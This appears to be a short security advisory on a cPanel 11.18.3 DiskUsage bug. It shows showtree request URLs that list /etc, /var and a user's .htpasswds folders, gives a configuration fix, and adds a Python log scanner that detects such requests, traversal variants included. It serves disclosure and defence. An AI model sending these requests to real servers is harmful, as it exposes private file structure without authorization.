There is a built-in bug connected to the DiskUsage function of cPanel. It allows you to list folders which should not be seen by unauthorized users.
You only need to submit this URL in a browser:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
You will now see only the folders that are inside /etc.
Example:
Directory Space Used:
etc/Pegasus 0.00 Meg
etc/X11 0.07 Meg
etc/X11/applnk 0.00 Meg
etc/X11/fs 0.00 Meg
etc/X11/serverconfig 0.00 Meg
etc/X11/starthere 0.03 Meg
etc/X11/sysconfig 0.00 Meg
Another example, to see the folders in /var:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var
That will show you the folders inside /var, like:
var/www/cgi-bin 0.00 Meg
var/www/error 0.19 Meg
var/www/error/include 0.01 Meg
var/www/html 0.00 Meg
var/www/icons 0.89 Meg
var/www/icons/small 0.25 Meg
var/yp 0.02 Meg
var/yp/binding 0.00 Meg
…etc
As another example, you can see folders that are protected by a deny rule or by authentication for password-protected folders.
For example, if you type:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
You will see all the folders inside although you are not supposed to.
Example:
home/user/.htpasswds/public_html 0.01 Meg
home/user/.htpasswds/public_html/admin 0.00 Meg
home/user/.htpasswds/public_html/admin/login 0.00 Meg
Tested on: cPanel version 11.18.3
Solution:
/var/cpanel/features/default is the file that controls which cPanel features are enabled.
Add to it:
diskusageviewer="0"
Then restart cPanel:
/etc/init.d/cpanel restart
This disables the option, which is not THAT important but is a huge security hole.
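To check whether the showtree parameter has already been used this way on a server, the following added example (not part of the original advisory or of cPanel) scans access-log lines for diskusage requests whose showtree target resolves outside the requesting account's home, or into a .htpasswds folder. It assumes Common Log Format with the authenticated account in the third field and account homes at /home/<account>; the sample log lines are constructed.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: Common Log Format, authenticated cPanel account in the third
# field, account homes at /home/<account>.
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]*\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - alice [01/Mar/2008:10:00:01 +0000] "GET /frontend/x/diskusage/index.html HTTP/1.1" 200 5120
192.0.2.10 - alice [01/Mar/2008:10:00:05 +0000] "GET /frontend/x/diskusage/index.html?showtree=/home/alice/public_html HTTP/1.1" 200 6200
192.0.2.44 - bob [01/Mar/2008:10:02:11 +0000] "GET /frontend/x/diskusage/index.html?showtree=/etc HTTP/1.1" 200 7431
192.0.2.44 - bob [01/Mar/2008:10:02:30 +0000] "GET /frontend/x/diskusage/index.html?showtree=%2Fhome%2Fbob%2F..%2F..%2Fvar HTTP/1.1" 200 9120
192.0.2.44 - bob [01/Mar/2008:10:03:02 +0000] "GET /frontend/x/diskusage/index.html?showtree=/home/bob/.htpasswds HTTP/1.1" 200 3010
"""

def classify(account, target):
    """Return (normalized_path, reason); reason is None when nothing is flagged."""
    # lstrip first: posixpath.normpath keeps a leading "//" as-is.
    path = posixpath.normpath("/" + target.lstrip("/"))  # collapses ../ segments
    home = "/home/" + account
    if path != home and not path.startswith(home + "/"):
        return path, "outside-home"
    if ".htpasswds" in path.split("/"):
        return path, "password-store"
    return path, None

def find_showtree_abuse(log_text):
    """Return a list of (client, account, normalized_path, reason) for flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, account, url = m.groups()
        parts = urlsplit(url)
        if not parts.path.endswith("/diskusage/index.html"):
            continue
        # parse_qs percent-decodes the value, so %2F-encoded paths are covered.
        for target in parse_qs(parts.query).get("showtree", []):
            path, reason = classify(account, target)
            if reason:
                hits.append((client, account, path, reason))
    return hits

if __name__ == "__main__":
    for hit in find_showtree_abuse(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Feed it the real access log text in place of SAMPLE_LOG; adjust LOG_RE if the server logs in a different format.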
